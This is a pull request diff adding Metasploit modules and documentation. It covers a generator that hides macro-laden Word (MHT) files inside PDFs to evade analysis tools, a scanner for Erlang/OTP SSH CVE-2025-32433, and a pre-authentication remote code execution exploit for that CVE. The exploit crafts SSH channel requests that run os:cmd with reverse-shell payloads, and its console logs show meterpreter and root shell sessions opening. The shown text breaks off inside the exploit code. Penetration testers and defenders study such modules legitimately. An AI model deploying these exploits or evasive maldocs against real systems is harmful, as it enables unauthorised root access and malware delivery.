### PR TITLE
Add: Maldoc in PDF polyglot fileformat module

### DIFF
--- a/documentation/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.md
+++ b/documentation/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.md
@@ -1,0 +1,101 @@
+## Vulnerable Application
+
+The technique is called "MalDoc in PDF". This technique hides malicious Word documents in PDF files,
+which is why malicious code contained in them cannot be detected by many analysis tools.
+
+The document can be opened in both Microsoft Word and a PDF reader.
+
+However, for the macro to run, you must open this document in Microsoft Word. The attack does not bypass
+configured macro locks. The malicious macros are also not executed when the file is opened in PDF readers
+or similar software.
+
+### Introduction
+
+A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
+structure of PDF.
+
+If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.
+
+## For Testing
+
+You create a `Single File Web Page (*.mht, *.mhtml)` file containing a VBS macro. For testing, you can use the
+following macro:
+
+```
+Sub AutoOpen()
+   MsgBox "Macro executed successfully!", vbInformation, "Information"
+End Sub
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `auxiliary/fileformat/maldoc_in_pdf_polyglot`
+3. Do: `set FILENAME /tmp/macro.htm`
+4. Do: `run`
+
+## Options
+
+### FILENAME
+
+The input MHT filename with macro embedded.
+
+### INJECTED_PDF
+
+The input PDF filename to be injected. (optional)
+
+### MESSAGE_PDF
+
+The message to display in the local PDF template (if INJECTED_PDF is NOT used). Default: You must open this document in Microsoft Word
+
+## Scenarios
+
+### Create without PDF template
+
+```
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > options 
+
+Module options (auxiliary/fileformat/maldoc_in_pdf_polyglot):
+
+   Name          Current Setting                                Required  Description
+   ----          ---------------                                --------  -----------
+   FILENAME      /tmp/macro.mht                                 yes       The input MHT filename with macro embedded
+   INJECTED_PDF                                                 no        The input PDF filename to be injected (optional)
+   MESSAGE_PDF   You must open this document in Microsoft Word  no        The message to display in the local PDF template (if INJECTED_PDF is NOT used)
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > run
+[*] PDF creation using local template
+[+] The file 'macro.doc' is stored at '/home/mekhalleh/.msf4/local/macro.doc'
+[*] Auxiliary module execution completed
+```
+
+### Create using PDF template
+
+```
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > options 
+
+Module options (auxiliary/fileformat/maldoc_in_pdf_polyglot):
+
+   Name          Current Setting                                Required  Description
+   ----          ---------------                                --------  -----------
+   FILENAME      /tmp/macro.mht                                 yes       The input MHT filename with macro embedded
+   INJECTED_PDF  /tmp/injected.pdf                              no        The input PDF filename to be injected (optional)
+   MESSAGE_PDF   You must open this document in Microsoft Word  no        The message to display in the local PDF template (if INJECTED_PDF is NOT used)
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > run
+[*] PDF creation using 'injected.pdf' as template
+[+] The file 'macro.doc' is stored at '/home/mekhalleh/.msf4/local/macro.doc'
+[*] Auxiliary module execution completed
+```
+
+## References
+
+1. <https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html>
+2. <https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/>
+3. <https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/>
+4. <https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo>

--- a/documentation/modules/auxiliary/scanner/ssh/ssh_erlangotp.md
+++ b/documentation/modules/auxiliary/scanner/ssh/ssh_erlangotp.md
@@ -1,0 +1,78 @@
+## Vulnerable Application
+
+Erlang/OTP is a set of libraries for the Erlang programming language.
+
+Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker
+to perform unauthenticated remote code execution (RCE).
+
+By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access
+to affected systems and execute arbitrary commands without valid credentials. This issue is patched in
+versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.
+
+### Introduction
+
+This module scans for CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH servers
+that allows remote command execution. It identifies vulnerable targets by connecting to the SSH service,
+checking for an Erlang-specific banner, and sending a crafted packets to test the server's response.
+
+## Testing
+
+### Vulnerable application
+
+Execute the following commands:
+
+```bash
+git clone https://github.com/ProDefense/CVE-2025-32433
+cd CVE-2025-32433
+docker build -t cve-ssh:latest .
+docker run -d -p 2222:2222 cve-ssh:latest
+```
+
+### Patched application
+
+Execute the following commands:
+
+```bash
+git clone https://github.com/exa-offsec/ssh_erlangotp_rce
+cd ssh_erlangotp_rce/patched
+docker build -t patched-ssh:latest .
+docker run -d -p 2223:2223 patched-ssh:latest
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `auxiliary/scanner/ssh/ssh_erlangotp`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Scenarios
+
+### Vulnerability scanner
+
+```
+msf6 auxiliary(scanner/ssh/ssh_erlangotp) > options 
+
+Module options (auxiliary/scanner/ssh/ssh_erlangotp):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   RHOSTS   192.168.1.16     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    2222             yes       The target port (TCP)
+   THREADS  1                yes       The number of concurrent threads (max one per host)
+
+View the full module info with the info, or info -d command.
+
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - The target is vulnerable to CVE-2025-32433.
+[*] 192.168.1.16:2222      - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## References
+
+1. <https://x.com/Horizon3Attack/status/1912945580902334793>
+2. <https://platformsecurity.com/blog/CVE-2025-32433-poc>
+3. <https://github.com/ProDefense/CVE-2025-32433>

--- a/documentation/modules/exploit/linux/ssh/ssh_erlangotp_rce.md
+++ b/documentation/modules/exploit/linux/ssh/ssh_erlangotp_rce.md
@@ -1,0 +1,153 @@
+## Vulnerable Application
+
+Erlang/OTP is a set of libraries for the Erlang programming language.
+
+Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker
+to perform unauthenticated remote code execution (RCE).
+
+By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access
+to affected systems and execute arbitrary commands without valid credentials. This issue is patched in
+versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.
+
+A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.
+
+### Introduction
+
+This module exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH servers
+that allows remote command execution. By sending crafted SSH packets, it executes a Metasploit
+payload to establish a reverse shell on the target system.
+
+The exploit leverages a flaw in the SSH protocol handling to execute commands via the Erlang `os:cmd`
+function without requiring authentication.
+
+## Testing
+
+Execute the following commands:
+
+```bash
+git clone https://github.com/ProDefense/CVE-2025-32433
+cd CVE-2025-32433
+docker build -t cve-ssh:latest .
+docker run -d -p 2222:2222 cve-ssh:latest
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/linux/ssh/ssh_erlangotp_rce`
+3. Do: `set RHOSTS [IP]`
+5. Do: `run`
+
+## Scenarios
+
+### Target 0
+
+Use the linux commands CMD.
+
+```
+msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options 
+
+Module options (exploit/linux/ssh/ssh_erlangotp_rce):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  192.168.1.16     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   2222             yes       The target port
+
+Payload options (cmd/linux/https/x64/meterpreter/reverse_tcp):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   FETCH_CHECK_CERT  false            yes       Check SSL certificate
+   FETCH_COMMAND     CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE      false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS    false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_SRVHOST                      no        Local IP to use for serving payload
+   FETCH_SRVPORT     8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                      no        Local URI to use for serving payload
+   LHOST             192.168.1.16     yes       The listen address (an interface may be specified)
+   LPORT             4444             yes       The listen port
+
+   When FETCH_FILELESS is false:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      PBAcwEBEszFT     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
+[*] Started reverse TCP handler on 192.168.1.16:4444 
+[*] Starting exploit for CVE-2025-32433
+[*] Connecting to SSH server...
+[*] Sending SSH banner...
+[+] Received banner: SSH-2.0-Erlang/5.1.4.7
+[*] Sending SSH_MSG_KEXINIT...
+[*] Sending SSH_MSG_CHANNEL_OPEN...
+[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] Payload sent successfully
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 6 opened (192.168.1.16:4444 -> 172.17.0.2:41536) at 2025-04-18 23:38:52 +0400
+
+meterpreter > 
+```
+
+### Target 1
+
+Use the unix commands CMD.
+
+```
+msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options 
+
+Module options (exploit/linux/ssh/ssh_erlangotp_rce):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  192.168.1.16     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   2222             yes       The target port
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.16     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Unix Command
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
+[*] Started reverse TCP handler on 192.168.1.16:4444 
+[*] Starting exploit for CVE-2025-32433
+[*] Connecting to SSH server...
+[*] Sending SSH banner...
+[+] Received banner: SSH-2.0-Erlang/5.1.4.7
+[*] Sending SSH_MSG_KEXINIT...
+[*] Sending SSH_MSG_CHANNEL_OPEN...
+[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] Payload sent successfully
+[*] Command shell session 7 opened (192.168.1.16:4444 -> 172.17.0.2:50092) at 2025-04-18 23:53:55 +0400
+
+whoami
+root
+```
+
+## References
+
+1. <https://x.com/Horizon3Attack/status/1912945580902334793>
+2. <https://platformsecurity.com/blog/CVE-2025-32433-poc>
+3. <https://github.com/ProDefense/CVE-2025-32433>

--- a/documentation/modules/exploit/linux/ssh/ssh_erlangotp_rce.md
+++ b/documentation/modules/exploit/linux/ssh/ssh_erlangotp_rce.md
@@ -9,8 +9,6 @@ By exploiting a flaw in SSH protocol message handling, a malicious actor could g
 to affected systems and execute arbitrary commands without valid credentials. This issue is patched in
 versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.
 
-A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.
-
 ### Introduction
 
 This module exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH servers
@@ -22,6 +20,8 @@ function without requiring authentication.
 
 ## Testing
 
+### Vulnerable application
+
 Execute the following commands:
 
 ```bash
@@ -31,12 +31,23 @@ docker build -t cve-ssh:latest .
 docker run -d -p 2222:2222 cve-ssh:latest
 ```
 
+### Patched application
+
+Execute the following commands:
+
+```bash
+git clone https://github.com/exa-offsec/ssh_erlangotp_rce
+cd ssh_erlangotp_rce/patched
+docker build -t patched-ssh:latest .
+docker run -d -p 2223:2223 patched-ssh:latest
+```
+
 ## Verification Steps
 
 1. Start msfconsole
 2. Do: `use exploit/linux/ssh/ssh_erlangotp_rce`
 3. Do: `set RHOSTS [IP]`
-5. Do: `run`
+4. Do: `run`
 
 ## Scenarios
 
@@ -84,18 +95,34 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
+msf6 exploit(linux/ssh/ssh_erlangotp_rce) > check
+[*] 192.168.1.16:2222 - Using auxiliary/scanner/ssh/ssh_erlangotp as check
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - The target is vulnerable to CVE-2025-32433.
+[*] 192.168.1.16:2222      - Scanned 1 of 1 hosts (100% complete)
+[+] 192.168.1.16:2222 - The target is vulnerable.
+
 msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
 [*] Started reverse TCP handler on 192.168.1.16:4444 
-[*] Starting exploit for CVE-2025-32433
-[*] Connecting to SSH server...
-[*] Sending SSH banner...
-[+] Received banner: SSH-2.0-Erlang/5.1.4.7
-[*] Sending SSH_MSG_KEXINIT...
-[*] Sending SSH_MSG_CHANNEL_OPEN...
-[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
-[+] Payload sent successfully
+[*] 192.168.1.16:2222 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.1.16:2222 - Using auxiliary/scanner/ssh/ssh_erlangotp as check
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - The target is vulnerable to CVE-2025-32433.
+[*] 192.168.1.16:2222      - Scanned 1 of 1 hosts (100% complete)
+[+] 192.168.1.16:2222 - The target is vulnerable.
+[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Starting exploit for CVE-2025-32433
+[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH banner...
+[+] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
+[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Payload sent successfully
 [*] Sending stage (3045380 bytes) to 172.17.0.2
-[*] Meterpreter session 6 opened (192.168.1.16:4444 -> 172.17.0.2:41536) at 2025-04-18 23:38:52 +0400
+[*] Meterpreter session 1 opened (192.168.1.16:4444 -> 172.17.0.2:42718) at 2025-04-20 17:31:35 +0400
 
 meterpreter > 
 ```
@@ -130,17 +157,33 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
+msf6 exploit(linux/ssh/ssh_erlangotp_rce) > check
+[*] 192.168.1.16:2222 - Using auxiliary/scanner/ssh/ssh_erlangotp as check
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - The target is vulnerable to CVE-2025-32433.
+[*] 192.168.1.16:2222      - Scanned 1 of 1 hosts (100% complete)
+[+] 192.168.1.16:2222 - The target is vulnerable.
+
 msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
 [*] Started reverse TCP handler on 192.168.1.16:4444 
-[*] Starting exploit for CVE-2025-32433
-[*] Connecting to SSH server...
-[*] Sending SSH banner...
-[+] Received banner: SSH-2.0-Erlang/5.1.4.7
-[*] Sending SSH_MSG_KEXINIT...
-[*] Sending SSH_MSG_CHANNEL_OPEN...
-[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
-[+] Payload sent successfully
-[*] Command shell session 7 opened (192.168.1.16:4444 -> 172.17.0.2:50092) at 2025-04-18 23:53:55 +0400
+[*] 192.168.1.16:2222 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.1.16:2222 - Using auxiliary/scanner/ssh/ssh_erlangotp as check
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.1.16:2222      - ssh://192.168.1.16:2222 - The target is vulnerable to CVE-2025-32433.
+[*] 192.168.1.16:2222      - Scanned 1 of 1 hosts (100% complete)
+[+] 192.168.1.16:2222 - The target is vulnerable.
+[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Starting exploit for CVE-2025-32433
+[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH banner...
+[+] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
+[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.1.16:2222 - ssh://192.168.1.16:2222 - Payload sent successfully
+[*] Command shell session 3 opened (192.168.1.16:4444 -> 172.17.0.2:45134) at 2025-04-20 17:33:33 +0400
 
 whoami
 root

--- a/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
+++ b/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
@@ -1,0 +1,232 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Maldoc in PDF Polyglot converter',
+        'Description' => %q{
+          A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
+          structure of PDF.
+
+          If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.
+
+          The attack does not bypass configured macro locks. And the malicious macros are also not executed when the
+          file is opened in PDF readers or similar software.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'mekhalleh (RAMELLA Sebastien)' # module author powered by EXA Reunion (https://www.exa.re/)
+        ],
+        'Platform' => ['win'],
+        'References' => [
+          ['URL', 'https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html'],
+          ['URL', 'https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/'],
+          ['URL', 'https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/'],
+          ['URL', 'https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPath.new('FILENAME', [true, 'The input MHT filename with macro embedded']),
+        OptPath.new('INJECTED_PDF', [false, 'The input PDF filename to be injected (optional)']),
+        OptString.new('MESSAGE_PDF', [false, 'The message to display in the local PDF template (if INJECTED_PDF is NOT used)', 'You must open this document in Microsoft Word'])
+      ]
+    )
+  end
+
+  def create_pdf(mht)
+    pdf = ''
+    pdf << "#{rand_pdfheader}\r\n"
+
+    # item 1 (catalog)
+    pdf << "1 0 obj\r\n"
+    pdf << "<< /Type /Catalog /Pages 2 0 R >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 2 (pages)
+    pdf << "2 0 obj\r\n"
+    pdf << "<< /Type /Pages /Kids [3 0 R] /Count 1 >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 3 (page with resources)
+    pdf << "3 0 obj\r\n"
+    pdf << "<< /Type /Page /Parent 2 0 R /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 612 792] /Contents 4 0 R >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 4 (content)
+    content = "BT /F1 12 Tf 100 700 Td (#{datastore['MESSAGE_PDF']}) Tj ET\r\n"
+    pdf << "4 0 obj\r\n"
+    # exact stream length
+    pdf << "<< /Length #{content.length} >>\r\n"
+    pdf << "stream\r\n"
+    pdf << content
+    pdf << "endstream\r\n"
+    pdf << "endobj\r\n"
+
+    # item 5 (helvetica font)
+    pdf << "5 0 obj\r\n"
+    pdf << "<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 6 (MHT content)
+    pdf << "6 0 obj\r\n"
+    pdf << "<< /Length #{mht.length} >>\r\n"
+    pdf << "stream\r\n"
+    pdf << mht
+    pdf << "\r\nendstream\r\n"
+    pdf << "endobj\r\n"
+
+    # calculation of dynamic offsets
+    offsets = []
+    offsets << 0
+    offsets << pdf.index('1 0 obj')
+    offsets << pdf.index('2 0 obj')
+    offsets << pdf.index('3 0 obj')
+    offsets << pdf.index('4 0 obj')
+    offsets << pdf.index('5 0 obj')
+    offsets << pdf.index('6 0 obj')
+
+    # XREF section
+    xref_start = pdf.length
+    pdf << "xref\r\n"
+    # update for 7 objects (0-6)
+    pdf << "0 7\r\n"
+    pdf << "0000000000 65535 f\r\n"
+    offsets[1..].each do |offset|
+      pdf << format("%010d 00000 n\r\n", offset)
+    end
+
+    # trailer
+    pdf << "trailer\r\n"
+    # update for 7 objects (0-6)
+    pdf << "<< /Size 7 /Root 1 0 R >>\r\n"
+    pdf << "startxref\r\n"
+    pdf << "#{xref_start}\r\n"
+    pdf << "%%EOF\r\n"
+
+    # saving the file
+    ltype = "auxiliary.fileformat.#{shortname}"
+    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), '.doc')
+    path = store_local(ltype, nil, pdf, fname)
+
+    print_good("The file '#{fname}' is stored at '#{path}'")
+  end
+
+  def inject_pdf(pdf_path, mht)
+    # read PDF in binary mode
+    pdf_data = File.binread(pdf_path)
+    vprint_status("PDF data length: #{pdf_data.length}")
+
+    # find the position of 'startxref'
+    startxref_index = pdf_data.rindex('startxref')
+    unless startxref_index
+      fail_with(Failure::Unknown, 'Invalid PDF: \'startxref\' not found')
+    end
+
+    xref_start_value = pdf_data[startxref_index..].match(/startxref\r?\n(\d+)/)[1].to_i
+    vprint_status("PDF startxref value: #{xref_start_value}")
+    vprint_status("PDF startxref position: #{startxref_index}")
+
+    # extract the original objects
+    original_objects = pdf_data[0...startxref_index]
+
+    # build the MHT object as the first object (0 0 obj)
+    mht_object = ''
+    mht_object << "0 0 obj\r\n"
+    mht_object << "<< /Length #{mht.length} >>\r\n"
+    mht_object << "stream\r\n"
+    mht_object << mht
+    mht_object << "\r\nendstream\r\n"
+    mht_object << "endobj\r\n"
+
+    # combine: MHT first, then original items
+    updated_objects = mht_object + original_objects
+
+    # calculate offsets for XREF section
+    offsets = []
+    updated_objects.scan(/(\d+) 0 obj/) do |match|
+      offsets << updated_objects.index("#{match[0]} 0 obj")
+    end
+
+    # build the XREF section
+    xref = "xref\r\n"
+    # includes free entry (0) and items
+    xref << "0 #{offsets.size + 1}\r\n"
+    # free entry
+    xref << "0000000000 65535 f\r\n"
+    offsets.each do |offset|
+      xref << format("%010d 00000 n\r\n", offset)
+    end
+
+    # build the trailer
+    xref_start_new = updated_objects.length
+    trailer = "trailer\r\n"
+    trailer << "<< /Size #{offsets.size + 1} /Root 1 0 R >>\r\n"
+    trailer << "startxref\r\n"
+    trailer << "#{xref_start_new}\r\n"
+    trailer << "%%EOF\r\n"
+
+    # assemble the final PDF
+    headers = "#{rand_pdfheader}\r\n"
+    pdf = headers + updated_objects + xref + trailer
+
+    # saving the file
+    ltype = "auxiliary.fileformat.#{shortname}"
+    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), '.doc')
+    path = store_local(ltype, nil, pdf, fname)
+
+    print_good("The file '#{fname}' is stored at '#{path}'")
+  end
+
+  def rand_pdfheader
+    # List of recognized PDF versions
+    pdf_versions = [
+      '1.0', '1.1', '1.2', '1.3', '1.4', '1.5', '1.6', '1.7', '2.0'
+    ]
+    # random verion selection
+    selected_version = pdf_versions.sample
+
+    "%PDF-#{selected_version}"
+  end
+
+  def run
+    if datastore['FILENAME'].nil? || datastore['FILENAME'].empty?
+      fail_with(Failure::BadConfig, 'No FILENAME provided')
+    end
+
+    content = File.read(datastore['FILENAME'])
+    if content.nil? || content.empty?
+      fail_with(Failure::BadConfig, 'The MHT file content is empty')
+    end
+
+    # if no pdf injected is provided, create new PDF from template
+    if datastore['INJECTED_PDF'].nil? || datastore['INJECTED_PDF'].empty?
+      print_status('PDF creation using local template')
+      if datastore['MESSAGE_PDF'].nil? || datastore['MESSAGE_PDF'].empty?
+        fail_with(Failure::BadConfig, 'No MESSAGE_PDF provided')
+      end
+      create_pdf(content)
+
+    # else if injected pdf is provided
+    else
+      print_status("PDF creation using '#{File.basename(datastore['INJECTED_PDF'])}' as template")
+
+      inject_pdf(datastore['INJECTED_PDF'], content)
+    end
+  end
+
+end

--- a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb
+++ b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb
@@ -1,0 +1,203 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Erlang OTP Pre-Auth RCE',
+        'Description' => %q{
+          This module exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH servers
+          that allows remote command execution. By sending crafted SSH packets, it executes a Metasploit
+          payload to establish a reverse shell on the target system.
+
+          The exploit leverages a flaw in the SSH protocol handling to execute commands via the Erlang `os:cmd`
+          function without requiring authentication.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Horizon3 Attack Team',
+          'Matt Keeley', # PoC
+          'Martin Kristiansen', # PoC
+          'mekhalleh (RAMELLA Sebastien)' # module author powered by EXA Reunion (https://www.exa.re/)
+        ],
+        'References' => [
+          ['CVE', '2025-32433'],
+          ['URL', 'https://x.com/Horizon3Attack/status/1912945580902334793'],
+          ['URL', 'https://platformsecurity.com/blog/CVE-2025-32433-poc'],
+          ['URL', 'https://github.com/ProDefense/CVE-2025-32433']
+        ],
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Platform' => 'linux',
+              'Arch' => ARCH_CMD,
+              'Type' => :linux_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/https/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command', {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2025-04-16',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
+  end
+
+  # Builds SSH_MSG_CHANNEL_OPEN for session
+  def build_channel_open(channel_id)
+    # SSH_MSG_CHANNEL_OPEN (0x5a) + formatted string + channel ID + window size + max packet size
+    "\x5a" +
+      string_payload('session') +
+      [channel_id].pack('N') +
+      [0x68000].pack('N') +
+      [0x10000].pack('N')
+  end
+
+  # Builds SSH_MSG_CHANNEL_REQUEST with 'exec' payload
+  def build_channel_request(channel_id, command)
+    # SSH_MSG_CHANNEL_REQUEST (0x62) + channel ID + 'exec' + want_reply + command
+    "\x62" +
+      [channel_id].pack('N') +
+      string_payload('exec') +
+      "\x01" +
+      string_payload("os:cmd(\"#{command}\").")
+  end
+
+  # Builds a minimal but valid SSH_MSG_KEXINIT packet
+  def build_kexinit
+    cookie = "\x00" * 16
+
+    "\x14" +
+      cookie +
+      name_list(
+        [
+          'curve25519-sha256',
+          'ecdh-sha2-nistp256',
+          'diffie-hellman-group-exchange-sha256',
